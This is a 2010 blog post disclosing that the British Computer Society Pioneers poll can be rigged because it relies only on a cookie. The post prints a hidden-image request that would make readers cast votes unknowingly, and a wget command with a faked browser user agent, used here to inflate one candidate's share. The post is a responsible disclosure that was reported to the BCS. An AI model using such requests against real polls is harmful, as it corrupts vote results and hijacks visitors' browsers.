Thursday, May 20, 2010

British Computer Society Pioneers vote is easily defrauded

Last night I was sitting looking at the BCS Pioneers page when I noticed that the voting for Hedy Lamarr was coming in thick and fast. As I refreshed the page I could that many, many votes were coming in for her. I hopped over to Twitter to see if there was an organized vote happening and there was nothing obvious.

That got me wondering just how hackable the vote is. It turns out that the BCS has done almost nothing to prevent vote fraud. The only protection is a cookie set in your browser. Turn off cookies and you can vote as often as you want. Even more interesting is that it's possible to completely automate vote fraud since the BCS doesn't even insist on a POST, doesn't appear to be rate controlling IP addresses, doesn't require the cookie to get set, isn't checking the page referrer, ... In fact, the only sensitive think is the User Agent string which needs to make it look like a real browser is being used.

For example, it would be trivial to make you vote for Alan Turing. Here's the code to do that (I modified this very slightly so that it won't actually work). I could embed that 'image' in this page and everyone reading this would be voting for Alan Turing in the background.
<img src="http://pioneers.bcs.org/?ctl00%24ctl00%24ctl00%24ContentPlaceHolderDefault%24ctl04=ctl00%24ctl00%24ctl00%24ContentPlaceHolderDefault%24Poll_11%24UpdatePanelPoll%7Cctl00%24ctl00%24ctl00%24ContentPlaceHolderDefault%24Poll_11%24ctl01%241&__EVENTTARGET=ctl00%24ctl00%24ctl00%24ContentPlaceHolderDefault%24Poll_11%24ctl01%241&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=%2FwEPDwUENTM4MQ9kFgJmD2QWAmYPZBYCZg9kFgJmD2QWAgILEGRkFgICCw9kFgJmD2QWAmYPZBYCZg9kFgYCAQ8WBB4EVGV4dAUgV2hvIGlzIHlvdXIgaW5mb3JtYXRpb24gcGlvbmVlcj8eB1Zpc2libGVoZAIFDw8WAh8BZ2QWAmYPZBYCAgEPEA8WAh4MQXV0b1Bvc3RCYWNrZ2RkFgBkAgcPZBYCAgEPFgIfAGVkZOsMaV4hR4JP4KkEQ37Qx2vlbLoZ&ctl00%24ctl00%24ctl00%24ContentPlaceHolderDefault%24Poll_11%24ctl01=&__ASYNCPOST=true">

In fact, that makes the vote security for this poll a total joke. Using a simple script containing the following I bumped up Alan Turing's percentage of the vote by a few tenths of percent as a test. If I'd left the script running I could have had him beating Hedy Lamarr within minutes.
wget --user-agent='Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5;en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9' -S http://pioneers.bcs.org/?cat post -O vote -d

So, what should the BCS have done? They could have used Flash Cookies to set a much more persistent cookie, they could have forced users to register and confirm an email address to vote, or they could have asked users to fill in a CAPTCHA to vote. As it is the current voting scheme is so open to fraud that the results are likely to be meaningless.

PS I emailed this blog post to the BCS and they replied:

Thanks very much for your email and blog post. We will be responding officially with a post on our blog shortly, but I just wanted to let you know that we have raised this issue with our site designer, and are looking at ways to change the voting system to keep it easy for people to vote and interact while preserving the vote's integrity.

Labels: ,

If you enjoyed this blog post, you might enjoy my travel book for people interested in science and technology: The Geek Atlas. Signed copies of The Geek Atlas are available.

<$BlogCommentBody$>

<$BlogCommentDateTime$> <$BlogCommentDeleteIcon$>

<$BlogBacklinkControl$> <$BlogBacklinkTitle$> <$BlogBacklinkDeleteIcon$>
<$BlogBacklinkSnippet$>